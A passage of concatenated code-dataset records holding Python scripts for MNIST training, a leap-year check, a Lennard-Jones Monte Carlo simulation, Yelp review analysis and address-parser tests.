randomly but keep target value assignments\n temp = np.append(Xtrain, Ytrain, axis=1)\n temp_shuffled = np.random.shuffle(temp)\n Xtrain_shuffled = temp[:,:784]\n Ytrain_shuffled = temp[:,784:]\n # Start looping over the minibatches\n for j in range(iterations):\n # Create random minibatches\n #indices = np.random.randint(0, len(Xtrain), 200)\n #Ymini_pt = Variable(FloatTensor(Ytrain_shuffled[indices]), requires_grad=False)\n #Xmini_pt = Variable(FloatTensor(Xtrain_shuffled[indices]), requires_grad=False)\n # Create minibatches\n Xmini_pt = Variable(FloatTensor(Xtrain_shuffled[j*m:(j*m)+m, :]), requires_grad=False)\n Ymini_pt = Variable(FloatTensor(Ytrain_shuffled[j*m:(j*m)+m, :]), requires_grad=False)\n # Initialize optimizer\n optimizer.zero_grad()\n # Predict label from subset\n Y_hat_pt = model(Xmini_pt)\n # Compute error every half epoch\n if ( j == 0 or j == int(iterations/2)):\n misc_err_train = calc_miscl_err(Xtrain_pt.data.numpy(), Ytrain_pt.data.numpy(), model(Xtrain_pt).data.numpy())\n sq_err_train = calc_avg_sq_err(Xtrain_pt.data.numpy(), Ytrain_pt.data.numpy(), model(Xtrain_pt).data.numpy())\n misc_train_arr = np.append(misc_train_arr, misc_err_train)\n error_train_arr = np.append(error_train_arr, sq_err_train)\n misc_err_test = calc_miscl_err(Xtest_pt.data.numpy(), Ytest_pt.data.numpy(), model(Xtest_pt).data.numpy())\n sq_err_test = calc_avg_sq_err(Xtest_pt.data.numpy(), Ytest_pt.data.numpy(), model(Xtest_pt).data.numpy())\n misc_test_arr = np.append(misc_test_arr, misc_err_test)\n error_test_arr = np.append(error_test_arr, sq_err_test)\n misc_err_dev = calc_miscl_err(Xdev_pt.data.numpy(), Ydev_pt.data.numpy(), model(Xdev_pt).data.numpy())\n sq_err_dev = calc_avg_sq_err(Xdev_pt.data.numpy(), Ydev_pt.data.numpy(), model(Xdev_pt).data.numpy())\n misc_dev_arr = np.append(misc_dev_arr, misc_err_dev)\n error_dev_arr = np.append(error_dev_arr, sq_err_dev)\n # Calculate loss on minibatch\n loss = loss_func.forward(Y_hat_pt, Ymini_pt)\n # Perform backpropagation\n loss.backward()\n # Increase optimizer\n optimizer.step()\n # Print output for loop control\n print(\"Epoch: %i, Error: %3.2f, Miscl. rate: %3.2f%% (all on dev set)\" % (i+1, sq_err_dev, misc_err_dev))\n\n #Print out lowest errors\n print()\n print(\"+++ Results: +++\")\n print(\"Lowest avg. sq. loss on training set: %3.5f at it. step %i\" % (np.amin(error_train_arr), np.argmin(error_train_arr)*0.5))\n print(\"Lowest avg. sq. loss on dev set: %3.5f at it. step %i\" % (np.amin(error_dev_arr), np.argmin(error_dev_arr)*0.5))\n print(\"Lowest avg. sq. loss on test set: %3.5f at it. step %i\" % (np.amin(error_test_arr), np.argmin(error_test_arr)*500))\n print(\"Lowest miscl. error rate on training set: %3.2f%% at it. step %i\" % (np.amin(misc_train_arr), np.argmin(misc_train_arr)*0.5))\n print(\"Lowest miscl. error rate on dev set: %3.2f%% at it. step %i\" % (np.amin(misc_dev_arr), np.argmin(misc_dev_arr)*0.5))\n print(\"Lowest miscl. error rate on test set: %3.2f%% at it. step %i\" % (np.amin(misc_test_arr), np.argmin(misc_test_arr)*0.5))\n print(\"Smallest number of total mistakes on training set: %i/60000 at it. step %i\" % (np.amin(misc_train_arr)*60000/100, np.argmin(misc_train_arr)*0.5))\n print(\"Smallest number of total mistakes on dev set: %i/10000 at it. step %i\" % (np.amin(misc_dev_arr)*10000/100, np.argmin(misc_dev_arr)*0.5))\n print(\"Smallest number of total mistakes on test set: %i/10000 at it. step %i\" % (np.amin(misc_test_arr)*10000/100, np.argmin(misc_test_arr)*0.5))\n print()\n # Extract some weights from input hidden_nodes\n model_list = list(model.parameters())\n model_weights = model_list[0].data.numpy()\n # Create plots\n x = np.arange(1,2*epochs+1,1, dtype='float')\n x /= 2\n fig = plt.figure(figsize=(16,6))\n plt.subplot(1,2,1)\n #axes = plt.gca()\n #axes.set_ylim([0.01,0.1])\n plt.semilogy(x, error_train_arr, label = \"Training error\", linewidth=2)\n plt.semilogy(x, error_dev_arr, label = \"Dev error\", linewidth=2)\n plt.semilogy(x, error_test_arr, label = \"Test error\", linewidth=2)\n plt.grid(True)\n plt.xlabel(\"Standardized epoch\")\n plt.ylabel(\"Averaged squared error\")\n plt.legend()\n plt.subplot(1,2,2)\n axes = plt.gca()\n axes.set_ylim([0,90])\n plt.plot(x, misc_train_arr, label = \"Training misclassification\", linewidth=2)\n plt.plot(x, misc_dev_arr, label = \"Dev misclassification\", linewidth=2)\n plt.plot(x, misc_test_arr, label = \"Test misclassification\", linewidth=2)\n plt.grid(True)\n plt.xlabel(\"Standardized epoch\")\n plt.ylabel(\"Misclassification rate in %\")\n plt.legend()\n plt.savefig(\"Problem_3.1_\"+str(eta)+\"_\"+str(epochs)+\".png\", bbox_inches='tight')\n plt.close(fig)\n # Plot weigths\n plot_10(model_weights, eta, epochs)\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Assignments/A4/Problem_3/Problem_3.1.py","file_name":"Problem_3.1.py","file_ext":"py","file_size_in_byte":11000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"139003285","text":"#An extra day is added to the calendar almost every four years as February 29,\r\n# and the day is called a leap day. It corrects the calendar for the fact that\r\n# our planet takes approximately 365.25 days to orbit the sun. A leap year\r\n# contains a leap day.\r\n#In the Gregorian calendar, 3 conditions are used to identify leap years:\r\n# -The year can be evenly divided by 4, is a leap year, unless:\r\n# - The year can be evenly divided by 100, it is NOT a leap year, unless:\r\n# - The year is also evenly divisible by 400. Then it is a leap year.\r\n\r\n#This means that in the Gregorian calendar, the years 2000 and 2400 are leap\r\n#years, while 1800, 1900, 2100, 2200, 2300 and 2500 are NOT leap years.\r\n\r\n#Task:\r\n# Given a year, determine whether it is a leap year. If it is a leap year,\r\n#return the Boolean True, otherwise return False.\r\n\r\n#leap year function\r\ndef is_leap(year):\r\n\r\n if year % 4 == 0 and year % 100 == 0 and year % 400 == 0:\r\n leap = True\r\n elif year % 4 == 0 and not year % 100 == 0 and not year % 400 == 0:\r\n leap = True\r\n else:\r\n leap = False\r\n\r\n return(leap)\r\n\r\n#User year input\r\nyear = int(input('Enter a year to check if it is a leap year: '))\r\nis_leap(year)\r\n","sub_path":"Basics/Write_a_func.py","file_name":"Write_a_func.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"525439439","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 9 23:38:40 2017\r\n\r\n@author: Carlos\r\n\"\"\"\r\n\r\n\"\"\"NOOOB PROJECT\"\"\"\r\n\r\nimport random as ran\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\nN=60\r\nsteps=5000\r\nLred=math.pow(N/0.5,1/3)\r\nAred=0.8\r\ndelta=1/4\r\ndef distance(xi,xii,yi,yii,zi,zii):\r\n sq1 = xi-xii-Lred*math.floor((xi-xii)/Lred+0.5)\r\n sq2 = yi-yii-Lred*math.floor((yi-yii)/Lred+0.5)\r\n sq3 = zi-zii-Lred*math.floor((zi-zii)/Lred+0.5)\r\n \r\n sq1=sq1*sq1\r\n sq2=sq2*sq2\r\n sq3=sq3*sq3 \r\n \r\n return math.sqrt(sq1 + sq2 + sq3)\r\n \r\n \r\nr=np.zeros([N,3])\r\nfor i in range(N):\r\n r[i,0]=ran.random()*Lred\r\n r[i,1]=ran.random()*Lred\r\n r[i,2]=ran.random()*Lred\r\n\r\nE=0 \r\nfor i in range(N):\r\n for j in range(N):\r\n Etemp=0\r\n if i 0:\n\t\t\t\t\tall_dates.append(iso_date_from_date(date))\n\t\t\t\telse:\n\t\t\t\t\tall_dates.append(\"\")\n\t\t\t\tbar.next()\n\t\t\tbar.finish()\n\n\t\t\trev_df.insert(8, \"iso_date\", all_dates, True) \n\t\t\trev_df.to_csv(filepath, index=False)\n\n\t\t\tprint(\"----------------------------------------------------------\")\n\n\ndef sort():\n\t\n\tprint(\"Reading cuisines...\")\n\tdf = pd.read_csv(\"./cuisines.csv\")\n\n\tprint(\"----------------------------------------------------------\")\n\n\t# print(\"Fixing dates...\")\n\t# print(\"----------------------------------------------------------\")\t\n\n\t# fix_all_dates()\n\t\n\tfor i, row in df.iterrows():\n\t\t\n\t\tcuisine_name = row[\"cuisine_name\"]\n\t\tfilepath = \"./cuisines/\" + cuisine_name + \"/reviews.csv\"\n\n\t\tif path.exists(filepath):\n\n\t\t\tprint(\"{0}/{1} Sorting reviews for: {2}\".format(i + 1, len(df.index), cuisine_name))\n\n\t\t\trev_df = pd.read_csv(filepath)\n\t\t\trev_df = rev_df.sort_values(by=['iso_date'], ascending=False)\n\n\t\t\trev_df.to_csv(filepath, index=False)\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\ndef nltk_tag_to_wordnet_tag(nltk_tag):\n\tif nltk_tag.startswith('J'):\n\t\treturn wordnet.ADJ\n\telif nltk_tag.startswith('V'):\n\t\treturn wordnet.VERB\n\telif nltk_tag.startswith('N'):\n\t\treturn wordnet.NOUN\n\telif nltk_tag.startswith('R'):\n\t\treturn wordnet.ADV\n\telse: \n\t\treturn None\n\n\ndef clean_sentence(sentence):\n\n\tsentence = sentence.translate(str.maketrans('', '', string.punctuation))\n\tsentence = sentence.lower()\n\n\tstop_words = set(stopwords.words('english'))\n\n\tword_tokens = nltk.word_tokenize(sentence)\n\n\tfiltered_sentence = []\n\tfor w in word_tokens:\n\t\tw = w.strip()\n\t\tif not w in stop_words and len(w) > 3:\n\t\t\tfiltered_sentence.append(w)\n\n\tfiltered_sentence = [w for w in word_tokens if not w in stop_words and len(w) > 3]\n\n\t# tokenize the sentence and find the POS tag for each token\n\tnltk_tagged = nltk.pos_tag(filtered_sentence)\n\n\t#tuple of (token, wordnet_tag)\n\twordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)\n\tlemmatized_sentence = []\n\tfor word, tag in wordnet_tagged:\n\t\tif tag is None:\n\t\t\t#if there is no available tag, append the token as is\n\t\t\tlemmatized_sentence.append(word)\n\t\telse: \n\t\t\t#else use the tag to lemmatize the token\n\t\t\tlemmatized_sentence.append(lemmatizer.lemmatize(word, tag))\n\n\tfinal = \" \".join(lemmatized_sentence)\n\n\treturn final\n\n\ndef restaurants_for_cuisine(cuisine):\n\n\trestaurants = []\n\n\twith open(RAW_BUSINESS_PATH) as f:\n\t\tall_lines = f.readlines()\n\t\tfor line in all_lines:\n\t\t\td = json.loads(line)\n\t\t\tcategories = d['categories']\n\t\t\tif len(categories) > 0 and any(s.startswith(cuisine) for s in categories):\n\t\t\t\trestaurants.append(d['business_id'])\n\n\treturn restaurants\n\n\ndef all_reviews():\n\t\n\treviews = []\n\n\twith open(RAW_REVIEW_PATH) as f:\n\t\tall_lines = f.readlines()\n\t\tbar = ChargingBar('Reading reviews...', max=len(all_lines))\n\t\tfor line in all_lines:\n\t\t\td = json.loads(line)\n\t\t\tif len(d) > 0:\n\t\t\t\treviews.append(d)\n\t\t\tbar.next()\n\t\tbar.finish()\n\n\treturn reviews\n\n\ndef reviews_to_csv(reviews):\n\t\n\tif len(reviews) > 0:\n\t\t\n\t\tprint(\"Reading cuisines...\")\n\t\tc_df = pd.read_csv('cuisines.csv')\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\t\tfor i, row in c_df.iterrows():\n\t\t\tcuisine_name = row['cuisine_name']\n\t\t\trestaurants = restaurants_for_cuisine(cuisine_name)\n\n\t\t\tfilepath = \"./cuisines/\" + cuisine_name\n\n\t\t\tprint(\"{0}/{1} Writing reviews for: {2}\".format(i + 1, len(c_df.index), cuisine_name))\n\t\t\t\n\t\t\tcolumns = ['business_id', 'votes_funny', 'votes_useful', 'votes_cool', 'user_id', 'review_id', 'stars', 'date', 'text', 'cleaned_text']\n\n\t\t\tdata = {\n\t\t\t\t'business_id' : [],\n\t\t\t\t'votes_funny' : [],\n\t\t\t\t'votes_useful' : [],\n\t\t\t\t'votes_cool' : [],\n\t\t\t\t'user_id' : [],\n\t\t\t\t'review_id' : [],\n\t\t\t\t'stars' : [],\n\t\t\t\t'date' : [],\n\t\t\t\t'text' : [],\n\t\t\t\t'cleaned_text' : []\n\t\t\t}\n\n\t\t\tif len(restaurants) > 0:\n\t\t\t\tbar = ChargingBar('Creating CSV', max=len(reviews), suffix='%(index)d / %(max)d | %(percent)d%%')\n\t\t\t\tfor r in reviews:\n\t\t\t\t\tbusiness_id = r['business_id']\n\t\t\t\t\tif business_id in restaurants:\n\t\t\t\t\t\tdata['business_id'].append(business_id)\n\t\t\t\t\t\tdata['votes_funny'].append(r['votes']['funny'])\n\t\t\t\t\t\tdata['votes_useful'].append(r['votes']['useful'])\n\t\t\t\t\t\tdata['votes_cool'].append(r['votes']['cool'])\n\t\t\t\t\t\tdata['user_id'].append(r['user_id'])\n\t\t\t\t\t\tdata['review_id'].append(r['review_id'])\n\t\t\t\t\t\tdata['stars'].append(r['stars'])\n\t\t\t\t\t\tdata['date'].append(r['date'])\n\t\t\t\t\t\tdata['text'].append(r['text'])\n\t\t\t\t\t\tdata['cleaned_text'].append(clean_sentence(r['text']))\n\t\t\t\t\tbar.next()\n\t\t\t\tbar.finish()\n\n\t\t\tnew_df = pd.DataFrame(data, columns=columns)\n\t\t\tnew_df.to_csv(filepath + '/reviews.csv', index=False)\n\t\t\t\n\t\t\tprint(\"----------------------------------------------------------\")\n\n\ndef reviews():\n\t\n\treviews = all_reviews()\n\n\treviews_to_csv(reviews)\n\n\ndef reviews_to_txt():\n\n\tprint(\"Reading cuisines...\")\n\tc_df = pd.read_csv('cuisines.csv')\n\n\tprint(\"----------------------------------------------------------\")\n\n\tfor i, row_i in c_df.iterrows():\n\t\tcuisine_name = row_i['cuisine_name']\n\n\t\tfilepath = './cuisines/' + cuisine_name + '/reviews.csv'\n\n\t\tprint(\"{0}/{1} Processing reviews for: {2}\".format(i + 1, len(c_df.index), cuisine_name))\n\n\t\tif path.exists(filepath):\n\t\t\trev_df = pd.read_csv(filepath)\n\t\t\tall_reviews = ''\n\t\t\tall_cleaned_reviews = ''\n\t\t\t\n\t\t\tbar = ChargingBar('Reading reviews', max=len(rev_df.index), suffix='%(index)d / %(max)d | %(percent)d%%')\n\t\t\tfor j, row_j in rev_df.iterrows():\n\t\t\t\tall_reviews += row_j['text'] + ' '\n\t\t\t\tall_cleaned_reviews += clean_sentence(row_j['text']) + ' '\n\t\t\t\tbar.next()\n\t\t\tbar.finish()\n\t\t\t\n\t\t\twrite_path = './cuisines/' + cuisine_name + '/'\n\t\t\t\n\t\t\tprint('Writing to txt...')\n\n\t\t\twith open(write_path + 'reviews_text.txt', 'w') as w:\n\t\t\t\tw.write(all_reviews)\n\n\t\t\twith open(write_path + 'reviews_cleaned_text.txt', 'w') as w:\n\t\t\t\tw.write(all_cleaned_reviews)\n\n\t\t\tprint(\"----------------------------------------------------------\")\n\n\ndef write_similarity(cuisine_matrix, cuisines, clusters=[]):\n\t\n\tprint(\"Writing files...\")\n\n\twith open('cuisine_sim_matrix' + '.csv', 'w') as f:\n\t\tfor i_list in cuisine_matrix:\n\t\t\ts = \"\"\n\t\t\tmy_max = max(i_list)\n\t\t\t\n\t\t\tfor tt in i_list:\n\t\t\t\ts = s + str(tt / my_max) + \" \"\n\t\t\ts = s.strip()\n\t\t\t\n\t\t\tf.write(\",\".join(s.split())+\"\\n\") #should the list be converted to m\n\n\twith open('cuisine_indices' + '.txt', 'w') as f:\n\t\tf.write(\",\".join(cuisines)+\"\\n\")\n\n\twrite_similarity_matrix_for_viz(cuisines, clusters)\n\n\ndef write_similarity_matrix_for_viz(cuisines, clusters=[], symmetric=True):\n\n\td = {}\n\tcount = 0\n\tfor c in cuisines:\n\t\td[c] = clusters[count] if len(clusters) > 0 else 0\n\t\tcount += 1\n\n\tnew_cat = cuisines\n\n\tprint(\"Writing CSV for Viz\")\n\n\tall_lines = []\n\n\twith open('cuisine_sim_matrix.csv', 'r') as f:\n\t\tfor line in f:\n\t\t\tall_lines.append(line)\n\n\tcolors = [\"#3a86ff\", \"#8338ec\", \"#ff006e\", \"#fb5607\", \"#ffbe0b\"]\n\n\tdf = pd.DataFrame(columns=[\"name_x\", \"name_y\", \"sim\", \"color\", \"cluster\"])\n\n\tsim_matrix = []\n\tbar = ChargingBar('Writing', max=len(all_lines))\n\tfor line in all_lines:\n\t\tall_sims = line.split(',')\n\t\tsim_matrix.append(all_sims)\n\n\tcount = 0\t\n\tfor cat in new_cat:\n\t\tcur_cat = cat\n\t\tall_sims = sim_matrix[cuisines.index(cat)]\n\t\ti = 0\n\t\tfor i in range(len(all_sims)):\n\t\t\tto_write = {}\n\t\t\tto_write['name_x'] = cur_cat\n\t\t\tto_write['name_y'] = new_cat[i]\n\t\t\tto_write['sim'] = all_sims[cuisines.index(new_cat[i])]\n\t\t\tto_write['cluster'] = d[cur_cat]\n\t\t\tif len(clusters) == 0:\n\t\t\t\tto_write['color'] = colors[0]\n\t\t\telse:\n\t\t\t\tcol = colors[clusters[count]] if count >= i else colors[clusters[i]]\n\t\t\t\tto_write['color'] = col #colors[clusters[count]]\n\t\t\tdf = df.append(to_write, ignore_index=True)\n\t\t\ti += 1\n\t\tcount += 1\n\t\tbar.next()\n\tbar.finish()\n\n\tdf.to_csv('sim_matrix_viz.csv')\n\n\ndef similarity():\n\n\tprint(\"Reading cuisines...\")\n\tc_df = pd.read_csv('cuisines.csv')\n\n\tprint(\"----------------------------------------------------------\")\n\n\treviews = []\n\n\tfor i, row_i in c_df.iterrows():\n\t\tcuisine_name = row_i['cuisine_name']\n\n\t\tfilepath = './cuisines/' + cuisine_name + '/reviews_text.txt'\n\n\t\tprint(\"{0}/{1} Processing reviews for: {2}\".format(i + 1, len(c_df.index), cuisine_name))\n\n\t\tif path.exists(filepath):\n\t\t\twith open(filepath) as f:\n\t\t\t\treviews.append(f.read().replace(\"\\n\", \" \"))\n\t\tprint(\"----------------------------------------------------------\")\n\n\n\tif len(reviews) > 0:\n\n\t\tidf = True\n\t\tmax_f = 4000\n\t\tK_clusters = 5\n\n\t\tt0 = time()\n\t\tprint(\"Extracting features from the training dataset using TfidfVectorizer\")\n\n\t\tvectorizer = TfidfVectorizer(min_df=3, max_df=0.5, max_features=max_f, stop_words='english', use_idf=idf)\n\n\t\ttfidf = vectorizer.fit_transform(reviews)\n\t\t\n\t\tprint(\"done in %fs\" % (time() - t0))\n\t\tprint(\"n_samples: %d, n_features: %d\" % tfidf.shape)\n\n\t\tprint('Computing similarity...')\n\n\t\tcosine_similarities = linear_kernel(tfidf, tfidf).flatten()\n\t\tprint(cosine_similarities.shape)\n\n\t\tshape = len(c_df.index)\n\t\tcuisine_matrix = cosine_similarities.reshape((shape, shape))\n\n\t\tprint('Clustering cuisines...')\n\t\t\n\t\tkm = KMeans(n_clusters=5)\n\t\tkm.fit(tfidf)\n\n\t\tclusters = km.labels_.tolist()\n\n\t\titems = {'cluster' : clusters}\n\t\tframe = pd.DataFrame(items, index = [clusters] , columns = ['cluster'])\n\t\tprint(frame['cluster'].value_counts())\n\n\t\twrite_similarity(cuisine_matrix, c_df['cuisine_name'].tolist(), clusters=clusters)\n\n\ndef sentiment_scores(sentence): \n \n\t# Create a SentimentIntensityAnalyzer object. \n\tsid_obj = SentimentIntensityAnalyzer() \n \n\t# polarity_scores method of SentimentIntensityAnalyzer \n\t# oject gives a sentiment dictionary. \n\t# which contains pos, neg, neu, and compound scores. \n\tsentiment_dict = sid_obj.polarity_scores(sentence)\n\t \n\t# print(\"Overall sentiment dictionary is : \", sentiment_dict) \n\t# print(\"sentence was rated as \", sentiment_dict['neg']*100, \"% Negative\") \n\t# print(\"sentence was rated as \", sentiment_dict['neu']*100, \"% Neutral\") \n\t# print(\"sentence was rated as \", sentiment_dict['pos']*100, \"% Positive\") \n \n\t# print(\"Sentence Overall Rated As\", end = \" \") \n \n\t# decide sentiment as positive, negative and neutral \n\t# if sentiment_dict['compound'] >= 0.05 :\n\t# \tprint(\"Positive\") \n \n\t# elif sentiment_dict['compound'] <= - 0.05 : \n\t# \tprint(\"Negative\") \n \n\t# else : \n\t# \tprint(\"Neutral\")\n\n\treturn sentiment_dict\n\n\ndef sentiment():\n\t\n\tprint(\"Reading cuisines...\")\n\tc_df = pd.read_csv('cuisines.csv')\n\n\tprint(\"----------------------------------------------------------\")\n\n\treviews = []\n\n\tfor i, row_i in c_df.iterrows():\n\t\tcuisine_name = row_i['cuisine_name']\n\n\t\tfilepath = './cuisines/' + cuisine_name + '/reviews.csv'\n\n\t\tprint(\"{0}/{1} Processing reviews for: {2}\".format(i + 1, len(c_df.index), cuisine_name))\n\n\t\tif path.exists(filepath):\n\t\t\trev_df = pd.read_csv(filepath)\n\n\t\t\tdata = {\n\t\t\t'sentiment_positive' : [],\n\t\t\t'sentiment_neutral' : [],\n\t\t\t'sentiment_negative' : [],\n\t\t\t'sentiment_compound' : [],\n\t\t\t}\n\n\t\t\tfor j, row_j in rev_df.iterrows():\n\t\t\t\ts = sentiment_scores(row_j['text'])\n\t\t\t\tdata['sentiment_positive'].append(s['pos'])\n\t\t\t\tdata['sentiment_neutral'].append(s['neu'])\n\t\t\t\tdata['sentiment_negative'].append(s['neg'])\n\t\t\t\tdata['sentiment_compound'].append(s['compound'])\n\n\t\t\trev_df['sentiment_positive'] = data['sentiment_positive']\n\t\t\trev_df['sentiment_neutral'] = data['sentiment_neutral']\n\t\t\trev_df['sentiment_negative'] = data['sentiment_negative']\n\t\t\trev_df['sentiment_compound'] = data['sentiment_compound']\n\n\t\t\trev_df.to_csv(filepath, index=False)\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\ndef ratings_over_time():\n\t\n\tprint(\"Reading cuisines...\")\n\tdf = pd.read_csv(\"./cuisines.csv\")\n\n\tprint(\"----------------------------------------------------------\")\n\t\n\tfor i, row in df.iterrows():\n\t\t\n\t\tcuisine_name = row[\"cuisine_name\"]\n\t\tfilepath = \"./cuisines/\" + cuisine_name + \"/reviews.csv\"\n\n\t\tif path.exists(filepath):\n\n\t\t\tprint(\"{0}/{1} Sorting reviews for: {2}\".format(i + 1, len(df.index), cuisine_name))\n\n\t\t\trev_df = pd.read_csv(filepath)\n\t\t\tnew_df = rev_df.sort_values(by=['iso_date'], ascending=True)\n\n\t\t\tnew_df = new_df.loc[:, ['date','iso_date', 'stars']]\n\t\t\tnew_df = new_df.rename(columns={\"stars\": \"value\"})\n\n\t\t\twrite_path = \"./cuisines/\" + cuisine_name + \"/ratings_over_time.csv\"\n\t\t\tnew_df.to_csv(write_path, index=False)\n\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\ndef users_to_csv(inputPath=RAW_USER_PATH, outputPath=\"./users.csv\"):\n\t\n\twith open(inputPath) as f:\n\t\tall_lines = f.readlines()\n\t\tbar = ChargingBar('Writing users', max=len(all_lines), suffix='%(index)d / %(max)d | %(percent)d%%')\n\n\t\tto_write = {\n\t\t\t\"user_id\" : [],\n\t\t\t\"name\" : [],\n\t\t}\n\n\t\tfor line in all_lines:\n\t\t\td = json.loads(line)\n\t\t\tto_write[\"user_id\"].append(d[\"user_id\"])\n\t\t\tto_write[\"name\"].append(d[\"name\"])\n\t\t\t# new_df = new_df.append(to_write, ignore_index=True)\n\t\t\tbar.next()\n\t\tbar.finish()\n\n\tnew_df = pd.DataFrame(to_write, columns=[\"user_id\", \"name\"])\n\n\tnew_df.to_csv(outputPath, index=False)\n\n\ndef users():\n\t\n\t# print(\"Writing users to CSV...\")\n\t# users_to_csv()\n\n\tprint(\"Reading cuisines...\")\n\tdf = pd.read_csv(\"./cuisines.csv\")\n\n\tprint(\"----------------------------------------------------------\")\n\n\tprint(\"Reading users...\")\n\tall_users_df = pd.read_csv(\"./users.csv\")\n\n\tprint(\"----------------------------------------------------------\")\n\t\n\tfor i, row in df.iterrows():\n\t\t\n\t\tcuisine_name = row[\"cuisine_name\"]\n\t\tfilepath = \"./cuisines/\" + cuisine_name + \"/reviews.csv\"\n\n\t\tif path.exists(filepath):\n\n\t\t\tprint(\"{0}/{1} Finding users for: {2}\".format(i + 1, len(df.index), cuisine_name))\n\n\t\t\trev_df = pd.read_csv(filepath)\n\n\t\t\tunique_users = rev_df['user_id'].tolist()\n\n\t\t\tcuisine_users = all_users_df.loc[all_users_df.user_id.isin(unique_users)]\n\n\t\t\tif len(cuisine_users.index) > 0:\n\t\t\t\twrite_path = \"./cuisines/\" + cuisine_name + \"/users.csv\"\n\t\t\t\tcuisine_users.to_csv(write_path, index=False)\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\n\ndef main():\n\t# Next\n\t# 1. Find Similarity \n\t# 2. Find Dishes\n\t# 3. Find sentiment rating\n\t# 4. Distribute reviews\n\t# 5. checkin\n\t# 6. tips\n\tpass\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"reviews.py","file_name":"reviews.py","file_ext":"py","file_size_in_byte":15869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"136490104","text":"import json\n\nimport pytest\n\nfrom addok.batch import process_documents\nfrom addok.core import search, Result\nfrom addok.ds import get_document\nfrom addok.helpers.text import Token\nfrom addok_luxemburg.utils import (clean_query, extract_address, flag_housenumber,\n fold_ordinal, glue_ordinal, make_labels,\n remove_leading_zeros)\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n (\"283, route d'Arlon L-1150 Luxembourg\",\n \"283 route d'Arlon L-1150 Luxembourg\"),\n (\"2 Arelerstrooss L-8552 Oberpallen (Uewerpallen)\",\n \"2 Arelerstrooss L-8552 Oberpallen (Uewerpallen)\"),\n])\ndef test_clean_query(input, expected):\n assert clean_query(input) == expected\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n (\"Société MJM BP 1234 L-9874 REMICH\",\n \"L-9874 REMICH\"),\n ('Monsieur Jean Mustermann 71, route du Vin L-1234 DUDELANGE',\n '71 route du Vin L-1234 DUDELANGE'),\n])\ndef test_extract_address(input, expected):\n assert extract_address(input) == expected\n\n\n@pytest.mark.parametrize(\"inputs,expected\", [\n (['6', 'bis'], ['6bis']),\n (['6'], ['6']),\n (['6', 'avenue'], ['6', 'avenue']),\n (['60', 'bis', 'avenue'], ['60bis', 'avenue']),\n (['600', 'ter', 'avenue'], ['600ter', 'avenue']),\n (['6', 'quinquies', 'avenue'], ['6quinquies', 'avenue']),\n (['60', 'sexies', 'avenue'], ['60sexies', 'avenue']),\n (['600', 'quater', 'avenue'], ['600quater', 'avenue']),\n (['6', 's', 'avenue'], ['6s', 'avenue']),\n (['60b', 'avenue'], ['60b', 'avenue']),\n (['600', 'b', 'avenue'], ['600b', 'avenue']),\n (['241', 'r', 'de'], ['241', 'r', 'de']),\n (['120', 'r', 'renard'], ['120', 'r', 'renard']),\n (['241', 'r', 'rue'], ['241r', 'rue']),\n (['place', 'des', 'terreaux'], ['place', 'des', 'terreaux']),\n (['rue', 'du', 'bis'], ['rue', 'du', 'bis']),\n])\ndef test_glue_ordinal(inputs, expected):\n tokens = [Token(input_) for input_ in inputs]\n assert list(glue_ordinal(tokens)) == expected\n\n\n@pytest.mark.parametrize(\"inputs,expected\", [\n (['6b'], True),\n (['6'], True),\n (['9303'], True),\n (['93031'], False), # postcode\n (['6', 'avenue'], True),\n (['60b', 'avenue'], True),\n (['600t', 'avenue'], True),\n (['6c', 'avenue'], True),\n (['60s', 'avenue'], True),\n (['600q', 'avenue'], True),\n (['6s', 'avenue'], True),\n (['60b', 'avenue'], True),\n (['600b', 'avenue'], True),\n (['241', 'r', 'de'], True),\n (['241r', 'rue'], True),\n (['place', 'des', 'terreaux'], False),\n (['rue', 'du', 'bis'], False),\n (['9', 'grand', 'rue'], True),\n])\ndef test_flag_housenumber(inputs, expected):\n tokens = [Token(input_) for input_ in inputs]\n tokens = list(flag_housenumber(tokens))\n assert tokens == inputs\n assert (tokens[0].kind == 'housenumber') == expected\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n ('60bis', '60b'),\n ('60BIS', '60b'),\n ('60ter', '60t'),\n ('4terre', '4terre'),\n ('60quater', '60q'),\n ('60 bis', '60 bis'),\n ('bis', 'bis'),\n])\ndef test_fold_ordinal(input, expected):\n assert fold_ordinal(Token(input)) == expected\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n ('03', '3'),\n ('00009', '9'),\n ('02230', '02230'), # Do not affect postcodes.\n ('0', '0'),\n])\ndef test_remove_leading_zeros(input, expected):\n assert remove_leading_zeros(input) == expected\n\n\ndef test_index_housenumbers_use_processors(config):\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'street',\n 'name': 'rue des Lilas',\n 'city': 'Paris',\n 'lat': '49.32545',\n 'lon': '4.2565',\n 'housenumbers': {\n '1 bis': {\n 'lat': '48.325451',\n 'lon': '2.25651'\n }\n }\n }\n process_documents(json.dumps(doc))\n stored = get_document('d|yyyy')\n assert stored['housenumbers']['1b']['raw'] == '1 bis'\n\n\n@pytest.mark.parametrize(\"input,expected\", [\n ('rue du 8 mai troyes', False),\n ('8 rue du 8 mai troyes', '8'),\n ('3 rue du 8 mai troyes', '3'),\n ('3 bis rue du 8 mai troyes', '3 bis'),\n ('3 bis r du 8 mai troyes', '3 bis'),\n ('3bis r du 8 mai troyes', '3 bis'),\n])\ndef test_match_housenumber(input, expected):\n doc = {\n 'id': 'xxxx',\n '_id': 'yyyy',\n 'type': 'street',\n 'name': 'rue du 8 Mai',\n 'city': 'Troyes',\n 'lat': '49.32545',\n 'lon': 